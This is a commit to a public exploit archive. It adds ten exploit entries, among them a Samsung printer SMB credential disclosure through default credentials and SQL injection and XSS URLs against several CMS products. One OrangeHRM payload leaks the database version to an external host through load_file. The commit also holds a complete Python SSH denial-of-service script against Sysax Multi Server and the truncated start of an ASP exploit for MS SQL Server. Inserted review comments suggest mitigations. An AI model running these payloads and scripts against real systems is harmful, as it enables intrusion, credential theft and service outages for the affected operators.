DB: 2015-08-30
10 new exploits
This commit is contained in:
parent
d891c95c0e
commit
4fe29b09c1
11 changed files with 799 additions and 0 deletions
10
files.csv
|
@ -34314,3 +34314,13 @@ id,file,description,date,author,platform,type,port
|
|||
37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0
|
||||
38000,platforms/php/webapps/38000.txt,"Wolf CMS Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80
|
||||
38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80
|
||||
38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80
|
||||
38005,platforms/windows/remote/38005.asp,"MS SQL Server 2000/2005 SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit",2015-08-29,ylbhz,windows,remote,0
|
||||
38006,platforms/php/webapps/38006.txt,"bloofoxCMS 0.3.5 Multiple Cross Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps,0
|
||||
38007,platforms/php/webapps/38007.txt,"DCForum auth_user_file.txt File Multiple Information Disclosure Vulnerabilities",2012-11-02,r45c4l,php,webapps,0
|
||||
38008,platforms/php/webapps/38008.txt,"Joomla! com_parcoauto Component 'idVeicolo' Parameter Remote SQL Injection Vulnerability",2012-11-03,"Andrea Bocchetti",php,webapps,0
|
||||
38009,platforms/php/webapps/38009.txt,"AWAuctionScript CMS Multiple Remote Vulnerabilities",2012-11-04,X-Cisadane,php,webapps,0
|
||||
38010,platforms/php/webapps/38010.txt,"VeriCentre Multiple SQL Injection Vulnerabilities",2012-11-06,"Cory Eubanks",php,webapps,0
|
||||
38011,platforms/php/webapps/38011.txt,"OrangeHRM 'sortField' Parameter SQL Injection Vulnerability",2012-11-07,"High-Tech Bridge",php,webapps,0
|
||||
38012,platforms/php/webapps/38012.txt,"WordPress FLV Player Plugin 'id' Parameter SQL Injection Vulnerability",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0
|
||||
38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40 SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22
|
||||
|
|
|
97
platforms/hardware/webapps/38004.txt
|
@ -0,0 +1,97 @@
|
|||
# Exploit Title: Samsung SyncThruWeb SMB Hash Disclosure
|
||||
|
||||
# Date: 8/28/15
|
||||
|
||||
# Exploit Author: Shad Malloy
|
||||
|
||||
# Contact: http://twitter.com/SecureNM
|
||||
|
||||
# Website: https://securenetworkmanagement.com
|
||||
|
||||
# Vendor Homepage: http://www.samsung.com
|
||||
|
||||
# Software Link:
|
||||
http://www.samsung.com/hk_en/consumer/solutions/type/SyncThruWebService.html
|
||||
|
||||
# Version: Known Vulnerable versions Samsung SCX-5835_5935 Series Printer
|
||||
Main Firmware Version : 2.01.00.26
|
||||
|
||||
Samsung SCX-5635 Series Printer Main Firmware Version : 2.01.01.18
|
||||
12-08-2009
|
||||
|
||||
|
||||
|
||||
# Tested on:
|
||||
|
||||
Samsung SCX-5835_5935 Series Printer
|
||||
|
||||
Main Firmware Version : 2.01.00.26
|
||||
|
||||
Network Firmware Version : V4.01.05(SCX-5835/5935)
|
||||
12-22-2008
|
||||
|
||||
Engine Firmware Version : 1.20.73
|
||||
|
||||
UI Firmware Version : V1.03.01.55 07-13-2009
|
||||
|
||||
Finisher Firmware Version : Not Installed
|
||||
|
||||
PCL5E Firmware Version : PCL5e 5.87 11-07-2008
|
||||
|
||||
PCL6 Firmware Version : PCL6 5.86 10-28-2008
|
||||
|
||||
PostScript Firmware Version : PS3 V1.93.06 12-19-2008
|
||||
|
||||
SPL Firmware Version : SPL 5.32 01-03-2008
|
||||
|
||||
TIFF Firmware Version : TIFF 0.91.00 10-07-2008
|
||||
|
||||
Samsung SCX-5635 Series
|
||||
|
||||
Main Firmware Version : 2.01.01.18 12-08-2009
|
||||
|
||||
Network Firmware Version : V4.01.16(SCX-5635)
|
||||
12-04-2009
|
||||
|
||||
Engine Firmware Version : 1.31.32
|
||||
|
||||
PCL5E Firmware Version : PCL5e 5.92 02-12-2009
|
||||
|
||||
|
||||
PCL6 Firmware Version : PCL6 5.93 03-21-2009
|
||||
|
||||
|
||||
PostScript Firmware Version : PS3 1.94.06 12-22-2008
|
||||
|
||||
TIFF Firmware Version : TIFF 0.91.00 10-07-2008
|
||||
|
||||
|
||||
|
||||
Proof of Concept
|
||||
|
||||
1. Using the default username and password (admin/admin), it is
|
||||
possible to obtain all credentials used for SMB file transfer. To obtain the
|
||||
file access http://<printer url>/smb_serverList.csv.
|
||||
|
||||
2. The UserName and UserPassword fields are unencrypted and
|
||||
visible using any text editor.
|
||||
|
||||
|
||||
|
||||
Relevant Patches
|
||||
|
||||
http://downloadcenter.samsung.com/content/FM/201508/20150825111208555/SCX563
|
||||
5_V2.01.01.28_0401113_1.00.zip
|
||||
|
||||
http://downloadcenter.samsung.com/content/FM/201508/20150825112233867/SCX583
|
||||
5_5935_V2.01.00.56_0401113_1.01.zip
|
||||
|
||||
|
||||
|
||||
Shad Malloy
|
||||
|
||||
Secure Network Management, LLC
|
||||
|
||||
|
||||
|
||||
|
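Review bot: The Proof of Concept section names the patched firmware but gives no mitigation for printers that cannot be updated, and the two preconditions it relies on — the factory `admin/admin` credentials and the SMB credentials stored unencrypted in `smb_serverList.csv` — are exactly what a defender needs called out. I would add one line after the patch links, e.g. `Mitigation: change the default admin password, restrict the SyncThru web UI to a management network, and treat every SMB account listed in smb_serverList.csv as exposed and rotate it.` The two download URLs appear to be model-specific (SCX-5635 vs SCX-5835/5935, judging from the file names), so naming the model next to each link would avoid the wrong firmware being applied.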
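--- a/platforms/php/webapps/38006.txt
+++ b/platforms/php/webapps/38006.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/56353/info
+
+bloofoxCMS is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+bloofoxCMS 0.3.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?'"--><script>alert(0x0004B3)</script>
+http://www.example.com/index.php?search='"--><script>alert(0x0004B3)</script>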
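--- a/platforms/php/webapps/38007.txt
+++ b/platforms/php/webapps/38007.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/56383/info
+
+DCForum is prone to multiple information-disclosure vulnerabilities.
+
+Exploiting these issues may allow an attacker to obtain sensitive information that may aid in further attacks.
+
+http://www.example.com/cgi-bin/User_info/auth_user_file.txt
+http://www.example.com/cgi-bin/dcforum/User_info/auth_user_file.txt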
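--- a/platforms/php/webapps/38008.txt
+++ b/platforms/php/webapps/38008.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/56384/info
+
+The Parcoauto component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_parcoauto&action=scheda&idVeicolo=2658810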
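--- a/platforms/php/webapps/38009.txt
+++ b/platforms/php/webapps/38009.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/56388/info
+
+AWAuctionScript CMS is prone to the following remote vulnerabilities because it fails to sufficiently sanitize user-supplied data:
+
+1. A remote SQL-injection vulnerability.
+2. A remote file-upload vulnerability.
+3. An HTML-injection vulnerability.
+
+Exploiting these issues could allow an attacker to execute arbitrary script code, upload arbitrary files, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+AWAuctionScript 1.0 is vulnerable; other version may also be affected.
+
+http://www.example.com/listing.php?category=Website&PageNo=-1'[SQL-Injection Vulnerability!]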
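--- a/platforms/php/webapps/38010.txt
+++ b/platforms/php/webapps/38010.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/56409/info
+
+VeriCentre is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+VeriCentre versions prior to 2.2 build 36 are vulnerable.
+
+http://www.example.com/WebConsole/terminal/paramedit.aspx?TerminalId=%27%2bconvert%28int,@
+@version%29%2b%27&ModelName=xxxx&ApplicationName=xxxx&ClusterId=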
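--- a/platforms/php/webapps/38011.txt
+++ b/platforms/php/webapps/38011.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/56417/info
+
+OrangeHRM is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+OrangeHRM 2.7.1-rc.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&sortField=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHA R(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114 ))))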
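--- a/platforms/php/webapps/38012.txt
+++ b/platforms/php/webapps/38012.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/56418/info
+
+The FLV Player plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+FLV Player 1.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp-content/plugins/hitasoft_player/config.php?id=1%20union%20all%20select%201,2,3,4,5,6,7,8,user_login,10,11,12,13,14,15,16,17 from wp_users--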
481
platforms/windows/dos/38014.py
|
@ -0,0 +1,481 @@
|
|||
'''
|
||||
# Exploit title: Sysax Multi Server 6.40 ssh component denial of service vulnerability
|
||||
# Date: 29-8-2015
|
||||
# Vendor homepage: http://www.sysax.com
|
||||
# Software Link: http://www.sysax.com/download/sysaxserv_setup.msi
|
||||
# Version: 6.40
|
||||
# Author: 3unnym00n
|
||||
|
||||
# Details:
|
||||
# ----------------------------------------------
|
||||
# byte SSH_MSG_USERAUTH_REQUEST
|
||||
# string user name
|
||||
# string service
|
||||
# string "password"
|
||||
# boolean FALSE
|
||||
|
||||
# Sysax Multi ssh Server doesn't correctly handle SSH_MSG_USERAUTH_REQUEST packet , when the "user name" length malformed can lead dos
|
||||
|
||||
# Tested On: win7, xp
|
||||
# operating steps:
|
||||
1. install Sysax Multi Server
|
||||
2. manage server setting > connection protocols confugure > ssh2 based secure shell and sftp/scp on port 22
|
||||
3. restart the server to let the configuration take effect
|
||||
4. modify the hostname in this py.
|
||||
5. running the py, the py will raise exception: sock.recv(block_size) socket.error: [Errno 10054]
|
||||
netstat -ano , the "22" disappeared.
|
||||
running the py again, u will see connect failed socket.error: [Errno 10061]
|
||||
|
||||
|
||||
|
||||
# remark: u can also modify the user auth service request packet, to adjust different user, different password
|
||||
|
||||
|
||||
'''
|
||||
|
||||
import socket
|
||||
import struct
|
||||
import os
|
||||
from StringIO import StringIO
|
||||
from hashlib import sha1
|
||||
from Crypto.Cipher import Blowfish, AES, DES3, ARC4
|
||||
from Crypto.Util import Counter
|
||||
from hmac import HMAC
|
||||
|
||||
## suppose server accept our first dh kex: diffie-hellman-group14-sha1
|
||||
P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF
|
||||
G = 2
|
||||
__sequence_number_out = 3
|
||||
|
||||
zero_byte = chr(0)
|
||||
one_byte = chr(1)
|
||||
four_byte = chr(4)
|
||||
max_byte = chr(0xff)
|
||||
cr_byte = chr(13)
|
||||
linefeed_byte = chr(10)
|
||||
crlf = cr_byte + linefeed_byte
|
||||
|
||||
class Message (object):
|
||||
"""
|
||||
An SSH2 message is a stream of bytes that encodes some combination of
|
||||
strings, integers, bools, and infinite-precision integers (known in Python
|
||||
as longs). This class builds or breaks down such a byte stream.
|
||||
|
||||
Normally you don't need to deal with anything this low-level, but it's
|
||||
exposed for people implementing custom extensions, or features that
|
||||
paramiko doesn't support yet.
|
||||
"""
|
||||
|
||||
big_int = long(0xff000000)
|
||||
|
||||
def __init__(self, content=None):
|
||||
"""
|
||||
Create a new SSH2 message.
|
||||
|
||||
:param str content:
|
||||
the byte stream to use as the message content (passed in only when
|
||||
decomposing a message).
|
||||
"""
|
||||
if content is not None:
|
||||
self.packet = StringIO(content)
|
||||
else:
|
||||
self.packet = StringIO()
|
||||
|
||||
def __str__(self):
|
||||
"""
|
||||
Return the byte stream content of this message, as a string/bytes obj.
|
||||
"""
|
||||
return self.asbytes()
|
||||
|
||||
def __repr__(self):
|
||||
"""
|
||||
Returns a string representation of this object, for debugging.
|
||||
"""
|
||||
return 'paramiko.Message(' + repr(self.packet.getvalue()) + ')'
|
||||
|
||||
def asbytes(self):
|
||||
"""
|
||||
Return the byte stream content of this Message, as bytes.
|
||||
"""
|
||||
return self.packet.getvalue()
|
||||
|
||||
|
||||
def add_bytes(self, b):
|
||||
"""
|
||||
Write bytes to the stream, without any formatting.
|
||||
|
||||
:param str b: bytes to add
|
||||
"""
|
||||
self.packet.write(b)
|
||||
return self
|
||||
|
||||
def add_byte(self, b):
|
||||
"""
|
||||
Write a single byte to the stream, without any formatting.
|
||||
|
||||
:param str b: byte to add
|
||||
"""
|
||||
self.packet.write(b)
|
||||
return self
|
||||
|
||||
def add_boolean(self, b):
|
||||
"""
|
||||
Add a boolean value to the stream.
|
||||
|
||||
:param bool b: boolean value to add
|
||||
"""
|
||||
if b:
|
||||
self.packet.write(one_byte)
|
||||
else:
|
||||
self.packet.write(zero_byte)
|
||||
return self
|
||||
|
||||
def add_size(self, n):
|
||||
"""
|
||||
Add an integer to the stream.
|
||||
|
||||
:param int n: integer to add
|
||||
"""
|
||||
self.packet.write(struct.pack('>I', n))
|
||||
return self
|
||||
|
||||
def add_int(self, n):
|
||||
"""
|
||||
Add an integer to the stream.
|
||||
|
||||
:param int n: integer to add
|
||||
"""
|
||||
if n >= Message.big_int:
|
||||
self.packet.write(max_byte)
|
||||
self.add_string(deflate_long(n))
|
||||
else:
|
||||
self.packet.write(struct.pack('>I', n))
|
||||
return self
|
||||
|
||||
def add_int(self, n):
|
||||
"""
|
||||
Add an integer to the stream.
|
||||
|
||||
@param n: integer to add
|
||||
@type n: int
|
||||
"""
|
||||
if n >= Message.big_int:
|
||||
self.packet.write(max_byte)
|
||||
self.add_string(deflate_long(n))
|
||||
else:
|
||||
self.packet.write(struct.pack('>I', n))
|
||||
return self
|
||||
|
||||
def add_int64(self, n):
|
||||
"""
|
||||
Add a 64-bit int to the stream.
|
||||
|
||||
:param long n: long int to add
|
||||
"""
|
||||
self.packet.write(struct.pack('>Q', n))
|
||||
return self
|
||||
|
||||
def add_mpint(self, z):
|
||||
"""
|
||||
Add a long int to the stream, encoded as an infinite-precision
|
||||
integer. This method only works on positive numbers.
|
||||
|
||||
:param long z: long int to add
|
||||
"""
|
||||
self.add_string(deflate_long(z))
|
||||
return self
|
||||
|
||||
def add_string(self, s):
|
||||
"""
|
||||
Add a string to the stream.
|
||||
|
||||
:param str s: string to add
|
||||
"""
|
||||
self.add_size(len(s))
|
||||
self.packet.write(s)
|
||||
return self
|
||||
|
||||
def add_list(self, l):
|
||||
"""
|
||||
Add a list of strings to the stream. They are encoded identically to
|
||||
a single string of values separated by commas. (Yes, really, that's
|
||||
how SSH2 does it.)
|
||||
|
||||
:param list l: list of strings to add
|
||||
"""
|
||||
self.add_string(','.join(l))
|
||||
return self
|
||||
|
||||
def _add(self, i):
|
||||
if type(i) is bool:
|
||||
return self.add_boolean(i)
|
||||
elif isinstance(i, int):
|
||||
return self.add_int(i)
|
||||
elif type(i) is list:
|
||||
return self.add_list(i)
|
||||
else:
|
||||
return self.add_string(i)
|
||||
|
||||
def add(self, *seq):
|
||||
"""
|
||||
Add a sequence of items to the stream. The values are encoded based
|
||||
on their type: str, int, bool, list, or long.
|
||||
|
||||
.. warning::
|
||||
Longs are encoded non-deterministically. Don't use this method.
|
||||
|
||||
:param seq: the sequence of items
|
||||
"""
|
||||
for item in seq:
|
||||
self._add(item)
|
||||
|
||||
|
||||
def deflate_long(n, add_sign_padding=True):
|
||||
"""turns a long-int into a normalized byte string (adapted from Crypto.Util.number)"""
|
||||
# after much testing, this algorithm was deemed to be the fastest
|
||||
s = bytes()
|
||||
n = long(n)
|
||||
while (n != 0) and (n != -1):
|
||||
s = struct.pack('>I', n & long(0xffffffff)) + s
|
||||
n >>= 32
|
||||
# strip off leading zeros, FFs
|
||||
for i in enumerate(s):
|
||||
if (n == 0) and (i[1] != chr(0)):
|
||||
break
|
||||
if (n == -1) and (i[1] != chr(0xff)):
|
||||
break
|
||||
else:
|
||||
# degenerate case, n was either 0 or -1
|
||||
i = (0,)
|
||||
if n == 0:
|
||||
s = chr(0)
|
||||
else:
|
||||
s = chr(0xff)
|
||||
s = s[i[0]:]
|
||||
if add_sign_padding:
|
||||
if (n == 0) and (ord(s[0]) >= 0x80):
|
||||
s = chr(0) + s
|
||||
if (n == -1) and (ord(s[0]) < 0x80):
|
||||
s = chr(0xff) + s
|
||||
return s
|
||||
|
||||
def inflate_long(s, always_positive=False):
|
||||
"""turns a normalized byte string into a long-int (adapted from Crypto.Util.number)"""
|
||||
out = long(0)
|
||||
negative = 0
|
||||
if not always_positive and (len(s) > 0) and (ord(s[0]) >= 0x80):
|
||||
negative = 1
|
||||
if len(s) % 4:
|
||||
filler = chr(0)
|
||||
if negative:
|
||||
filler = chr(0xff)
|
||||
# never convert this to ``s +=`` because this is a string, not a number
|
||||
# noinspection PyAugmentAssignment
|
||||
s = filler * (4 - len(s) % 4) + s
|
||||
for i in range(0, len(s), 4):
|
||||
out = (out << 32) + struct.unpack('>I', s[i:i+4])[0]
|
||||
if negative:
|
||||
out -= (long(1) << (8 * len(s)))
|
||||
return out
|
||||
|
||||
def byte_mask(c, mask):
|
||||
return chr(ord(c) & mask)
|
||||
|
||||
|
||||
|
||||
|
||||
def _compute_key(K, H, session_id, id, nbytes):
|
||||
"""id is 'A' - 'F' for the various keys used by ssh"""
|
||||
m = Message()
|
||||
m.add_mpint(K)
|
||||
m.add_bytes(H)
|
||||
m.add_byte(str(id))
|
||||
m.add_bytes(session_id)
|
||||
out = sofar = sha1(m.asbytes()).digest()
|
||||
while len(out) < nbytes:
|
||||
m = Message()
|
||||
m.add_mpint(K)
|
||||
m.add_bytes(H)
|
||||
m.add_bytes(sofar)
|
||||
digest = sha1(m.asbytes()).digest()
|
||||
out += digest
|
||||
sofar += digest
|
||||
return out[:nbytes]
|
||||
|
||||
|
||||
def compute_hmac(key, message, digest_class):
|
||||
return HMAC(key, message, digest_class).digest()
|
||||
|
||||
|
||||
def read_msg(sock, block_engine_in, block_size, mac_size):
|
||||
header = sock.recv(block_size)
|
||||
header = block_engine_in.decrypt(header)
|
||||
packet_size = struct.unpack('>I', header[:4])[0]
|
||||
leftover = header[4:]
|
||||
buf = sock.recv(packet_size + mac_size - len(leftover))
|
||||
packet = buf[:packet_size - len(leftover)]
|
||||
post_packet = buf[packet_size - len(leftover):]
|
||||
packet = block_engine_in.decrypt(packet)
|
||||
packet = leftover + packet
|
||||
|
||||
def send_msg(sock, raw_data, block_engine_out, mac_engine_out, mac_key_out, mac_size):
|
||||
global __sequence_number_out
|
||||
out = block_engine_out.encrypt(raw_data)
|
||||
|
||||
payload = struct.pack('>I', __sequence_number_out) + raw_data
|
||||
out += compute_hmac(mac_key_out, payload, mac_engine_out)[:mac_size]
|
||||
sock.send(out)
|
||||
__sequence_number_out += 1
|
||||
|
||||
def exploit(hostname, port):
|
||||
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
sock.connect((hostname, port))
|
||||
|
||||
## send client banner
|
||||
client_banner = 'SSH-2.0-SUCK\r\n'
|
||||
sock.send(client_banner)
|
||||
## recv server banner
|
||||
server_banner = ''
|
||||
while True:
|
||||
data = sock.recv(1)
|
||||
if data == '\x0a':
|
||||
break
|
||||
server_banner += data
|
||||
|
||||
print 'server banner is: ', server_banner.__repr__()
|
||||
|
||||
## do key exchange
|
||||
## send client algorithms
|
||||
cookie = os.urandom(16)
|
||||
|
||||
|
||||
client_kex = '000001cc0514'.decode('hex') + cookie + '000000596469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000237373682d7273612c7373682d6473732c65636473612d736861322d6e69737470323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e65000000000000000000000000000000000000'.decode('hex')
|
||||
sock.send(client_kex)
|
||||
client_kex_init = client_kex[5:-5]
|
||||
|
||||
|
||||
## recv server algorithms
|
||||
server_kex = ''
|
||||
str_pl = sock.recv(4)
|
||||
pl = struct.unpack('>I', str_pl)[0]
|
||||
tmp = sock.recv(pl)
|
||||
padding_len = ord(tmp[0])
|
||||
server_kex_init = tmp[1:-padding_len]
|
||||
|
||||
## do dh kex
|
||||
## send client dh kex
|
||||
x = 2718749950853797850634218108087830670950606437648125981418769990607126772940049948484122336910062802584089370382091267133574445173294378254000629897200925498341633999513190035450218329607097225733329543524028305346861620006860852918487068859161361831623421024322904154569598752827192453199975754781944810347
|
||||
e = 24246061990311305114571813286712069338300342406114182522571307971719868860460945648993499340734221725910715550923992743644801884998515491806836377726946636968365751276828870539451268214005738703948104009998575652199698609897222885198283575698226413251759742449790092874540295563182579030702610986594679727200051817630511413715723789617829401744474112405554024371460263485543685109421717171156358397944976970310869333766947439381332202584288225313692797532554689171177447651177476425180162113468471927127194797168639270094144932251842745747512414228391665092351122762389774578913976053048427148163469934452204474329639
|
||||
client_dh_kex = '0000010c051e0000010100c010d8c3ea108d1915c9961f86d932f3556b82cd09a7e1d24c88f7d98fc88b19ca3908cada3244dfc5534860b967019560ce5ee243007d41ecf68e9bfa7631847ecb1091558fd7ffe2f17171115690a6d10f3b62c317157ced9291770cc452cc93fb911f18de644ef988c09a3bff35770e99d1546d31c320993f8c12bb275cd2742afc547a0f3309c29a6e72611af965b6144b837ca2003c3ca1f3e35797ab143669b9034c575794c645383519d485a133e67d0793097ef08b72523fa3199c35358676d1fd9776248cae08e46da6414d0f975ffa4b4c84f69db86c47401808daa8a5919fc52ebed157b99e0dd2a4203f0c9e06d6395fa5c9b38a7ae8b159ea270000000000'.decode('hex')
|
||||
sock.send(client_dh_kex)
|
||||
|
||||
## recv server dh kex
|
||||
str_pl = sock.recv(4)
|
||||
pl = struct.unpack('>I', str_pl)[0]
|
||||
server_dh_kex = sock.recv(pl)
|
||||
|
||||
## send client newkeys
|
||||
client_newkeys = '0000000c0a1500000000000000000000'.decode('hex')
|
||||
sock.send(client_newkeys)
|
||||
|
||||
## recv server newkeys
|
||||
str_pl = sock.recv(4)
|
||||
pl = struct.unpack('>I', str_pl)[0]
|
||||
server_new_keys = sock.recv(pl)
|
||||
|
||||
|
||||
## calc all we need ...
|
||||
host_key_len = struct.unpack('>I', server_dh_kex[2:6])[0]
|
||||
# print host_key_len
|
||||
host_key = server_dh_kex[6:6 + host_key_len]
|
||||
|
||||
f_len = struct.unpack('>I', server_dh_kex[6 + host_key_len:10 + host_key_len])[0]
|
||||
str_f = server_dh_kex[10 + host_key_len:10 + host_key_len + f_len]
|
||||
dh_server_f = inflate_long(str_f)
|
||||
|
||||
sig_len = struct.unpack('>I', server_dh_kex[10 + host_key_len + f_len:14 + host_key_len + f_len])[0]
|
||||
sig = server_dh_kex[14 + host_key_len + f_len:14 + host_key_len + f_len + sig_len]
|
||||
|
||||
K = pow(dh_server_f, x, P)
|
||||
## build up the hash H of (V_C || V_S || I_C || I_S || K_S || e || f || K), aka, session id
|
||||
hm = Message()
|
||||
|
||||
hm.add(client_banner.rstrip(), server_banner.rstrip(),
|
||||
client_kex_init, server_kex_init)
|
||||
|
||||
hm.add_string(host_key)
|
||||
hm.add_mpint(e)
|
||||
hm.add_mpint(dh_server_f)
|
||||
hm.add_mpint(K)
|
||||
|
||||
H = sha1(hm.asbytes()).digest()
|
||||
|
||||
## suppose server accept our first cypher: aes128-ctr, hmac-sha1
|
||||
block_size = 16
|
||||
key_size = 16
|
||||
mac_size = 20
|
||||
|
||||
IV_out = _compute_key(K, H, H, 'A', block_size)
|
||||
key_out = _compute_key(K, H, H, 'C', key_size)
|
||||
|
||||
block_engine_out = AES.new(key_out, AES.MODE_CTR, IV_out, Counter.new(nbits=block_size * 8, initial_value=inflate_long(IV_out, True)))
|
||||
mac_engine_out = sha1
|
||||
mac_key_out = _compute_key(K, H, H, 'E', mac_engine_out().digest_size)
|
||||
|
||||
IV_in = _compute_key(K, H, H, 'B', block_size)
|
||||
key_in = _compute_key(K, H, H, 'D', key_size)
|
||||
block_engine_in = AES.new(key_in, AES.MODE_CTR, IV_in, Counter.new(nbits=block_size * 8, initial_value=inflate_long(IV_in, True)))
|
||||
mac_engine_in = sha1
|
||||
mac_key_in = _compute_key(K, H, H, 'F', mac_engine_in().digest_size)
|
||||
|
||||
## do user auth
|
||||
## send client service request (user auth)
|
||||
client_service_request = '\x00\x00\x00\x1C\x0A\x05\x00\x00\x00\x0C\x73\x73\x68\x2D\x75\x73\x65\x72\x61\x75\x74\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
## encrypt the packet
|
||||
send_msg(sock, client_service_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)
|
||||
|
||||
|
||||
## recv server service accept
|
||||
read_msg(sock, block_engine_in, block_size, mac_size)
|
||||
|
||||
## send client userauth request
|
||||
client_userauth_request = '\x00\x00\x00\x3C\x08\x32'
|
||||
## the user name length and username
|
||||
client_userauth_request += '\x00\x00\x32\xe4' # malformed
|
||||
client_userauth_request += 'root'
|
||||
|
||||
## service
|
||||
client_userauth_request += '\x00\x00\x00\x0E'
|
||||
client_userauth_request += 'ssh-connection'
|
||||
|
||||
## password
|
||||
client_userauth_request += '\x00\x00\x00\x08'
|
||||
client_userauth_request += 'password'
|
||||
client_userauth_request += '\x00'
|
||||
|
||||
## plaintext password fuckinA
|
||||
client_userauth_request += '\x00\x00\x00\x07'
|
||||
client_userauth_request += 'fuckinA'
|
||||
|
||||
## padding
|
||||
client_userauth_request += '\x00'*8
|
||||
|
||||
## encrypt the packet
|
||||
print 'send client_userauth_request'
|
||||
send_msg(sock, client_userauth_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)
|
||||
|
||||
|
||||
## recv server userauth success
|
||||
print 'recv server userauth success'
|
||||
read_msg(sock, block_engine_in, block_size, mac_size)
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
hostname = '192.168.242.128'
|
||||
port = 22
|
||||
exploit(hostname, port)
|
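Review bot: The header docstring describes the trigger ("user name length malformed") but not the fault class, which is the part anyone triaging the server side needs: the USERAUTH_REQUEST assembled near the end of `exploit()` declares a user-name length of `\x00\x00\x32\xe4` (13028 bytes) inside a packet whose own length field is `\x00\x00\x00\x3C` (60 bytes), so the reset the script observes presumably comes from the server trusting a string length larger than the remaining payload. I would say so in the `# Details:` block, hedged because the script only sees the connection drop: `# root cause (assumed): the server does not check the declared string length against the bytes left in the packet`. The corresponding server-side fix is that bounds check in the packet parser, rejecting any SSH string whose declared length exceeds the decrypted payload that remains. `read_msg` also never checks the received MAC, which matters only for correctness of the client-side decode, not for the crash described.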
145
platforms/windows/remote/38005.asp
|
@ -0,0 +1,145 @@
|
|||
<%
|
||||
Function Padding(intLen)
|
||||
Dim strRet, intSize
|
||||
intSize = intLen/2 - 1
|
||||
For I = 0 To intSize Step 1
|
||||
strRet = strRet & unescape("%u4141")
|
||||
Next
|
||||
Padding = strRet
|
||||
End Function
|
||||
|
||||
Function PackDWORD(strPoint)
|
||||
strTmp = replace(strPoint, "0x", "")
|
||||
PackDWORD = PackDWORD & UnEscape("%u" & Mid(strTmp, 5, 2) & Mid(strTmp, 7, 2))
|
||||
PackDWORD = PackDWORD & UnEscape("%u" & Mid(strTmp, 1, 2) & Mid(strTmp, 3, 2))
|
||||
End Function
|
||||
|
||||
Function PackList(arrList)
|
||||
